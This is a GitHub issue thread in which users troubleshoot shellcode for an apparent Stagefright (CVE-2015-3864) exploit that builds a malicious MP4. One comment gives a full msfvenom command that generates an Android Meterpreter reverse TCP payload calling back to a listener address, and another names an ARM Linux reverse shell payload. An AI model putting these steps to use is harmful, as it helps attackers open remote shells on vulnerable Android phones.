-
Notifications
You must be signed in to change notification settings - Fork 15
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Shellcode #2
Comments
i generated it with msfvenom actually but haven't been able to get it working successfully, so i suggest using your own shellcode. the included shellcode is supposed to be a reverse tcp shell for android arm architecture. |
I generated shellcode.bin with msfvenom(msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.21 lport=1996 R > shellcode.bin) and created exploit.mp4, but this exploit doesn't work in my device(Samsung Galaxy Note 8, armv7-a , Android 4.4.4 official) my device is vulnerable to cve-2015-3864(tested in Zimperium Stagefright Detector). |
@eudemonics Can you give any working shellcode or tell how to generate one to test the code. |
This shellcode armle/linux/reverse_tcp |
@umerov1999
Did you get the reverse shell successfully with the code, you've posted above? I don't with mine and I'm unsure how to test it. |
How to make a shellcode for this exploit. You shellcode.bin is the apk file, is that correct? You tested this exploit?(Как сделать шелл-код для эксплоита. У вас shellcode.bin является apk файлом. Это правильно и вы тестировали этот эксплоит?)
The text was updated successfully, but these errors were encountered: